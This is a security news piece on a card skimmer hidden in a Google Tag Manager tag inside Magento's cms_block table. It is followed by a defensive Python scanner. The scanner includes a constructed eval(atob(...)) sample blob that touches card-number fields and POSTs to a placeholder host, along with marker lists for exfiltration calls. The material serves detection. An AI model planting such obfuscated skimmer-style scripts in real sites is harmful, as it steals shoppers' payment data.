Threat actors have been spotted delivering credit card skimmer malware to Magento-based e-commerce websites via Google Tag Manager (GTM).
Sucuri, a website security company, says the code contains an obfuscated backdoor that gives attackers persistent access, even though it looks like an ordinary GTM and Google Analytics script used for website analytics and advertising.
As of writing, as many as have been found to be infected with the GTM identifier (GTM-MLHK2N68) in question, down from the six reported by Sucuri. A GTM identifier refers to a container that holds the various tracking codes (such as Google Analytics and Facebook Pixel) together with the rules that fire them when certain conditions are met.
Further analysis revealed that the malware is loaded from the "cms_block" table in the Magento database: a JavaScript payload that acts as a credit card skimmer is encoded inside the GTM tag stored in the block's "content" field.
Security researcher Puja Srivastava said that "this script was created to collect sensitive information that customers have entered during the checkout process and send it to a remote server that the attackers control."
The malware is designed to steal credit card data from checkout pages and send it to a remote server upon execution.
This is not the first time GTM has been abused for malicious ends. Sucuri disclosed in April 2018 that the tool was being used for illicit purposes.
The development comes a few weeks after the company revealed another WordPress campaign that allegedly used compromised admin accounts or plugin vulnerabilities to install malware that redirected site visitors to malicious URLs.
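As an added defender-side example (not code from Sucuri or the report), the following Python scan walks constructed Magento `cms_block` rows and flags GTM container IDs that are not on the site's allow-list, plus base64-encoded script blobs that reference checkout fields or exfiltration calls. The container IDs, marker strings and sample rows are assumptions for illustration.

```python
import base64
import re

# Constructed sample rows shaped like Magento's cms_block table: (identifier, content).
# The "skimmer-like" blob is an illustrative stand-in, not the payload from the incident.
_FAKE_BLOB = base64.b64encode(
    b"document.querySelectorAll('input[name*=cc_number]');"
    b"fetch('https://placeholder.invalid/c', {method:'POST'})"
).decode()
SAMPLE_CMS_BLOCKS = [
    ("footer_links", "<ul><li><a href='/about'>About</a></li></ul>"),
    ("gtm_head", "<script>(function(w,d,s,l,i){w[l]=w[l]||[];})"
                 "(window,document,'script','dataLayer','GTM-ABC1234');</script>"),
    ("analytics_extra", "<script src='https://www.googletagmanager.com/gtm.js?id=GTM-XYZ9876'></script>"),
    ("promo_banner", "<script>eval(atob('" + _FAKE_BLOB + "'));</script>"),
]

# Assumed allow-list: containers the site operator actually configured.
KNOWN_CONTAINERS = {"GTM-ABC1234"}
# Strings a skimmer typically touches: card fields and outbound transport calls.
SKIMMER_MARKERS = ("cc_number", "cardnumber", "checkout", "fetch(", "XMLHttpRequest", "sendBeacon")

GTM_ID_RE = re.compile(r"GTM-[A-Z0-9]{4,}")
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")


def scan_block(identifier, content):
    """Return a list of human-readable findings for one cms_block row."""
    findings = []
    for gtm_id in sorted(set(GTM_ID_RE.findall(content))):
        if gtm_id not in KNOWN_CONTAINERS:
            findings.append(f"unknown GTM container {gtm_id}")
    for blob in ATOB_RE.findall(content):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            continue  # not valid base64; leave it for manual review
        hits = [m for m in SKIMMER_MARKERS if m in decoded]
        if hits:
            findings.append("base64 script references " + ", ".join(hits))
    return findings


def scan_cms_blocks(rows):
    """Map block identifier -> findings, keeping only blocks with at least one finding."""
    return {ident: f for ident, content in rows if (f := scan_block(ident, content))}


if __name__ == "__main__":
    for ident, findings in scan_cms_blocks(SAMPLE_CMS_BLOCKS).items():
        print(ident, "->", "; ".join(findings))
```

In a real deployment the rows would come from `SELECT identifier, content FROM cms_block`, and the allow-list from the operator's own GTM account.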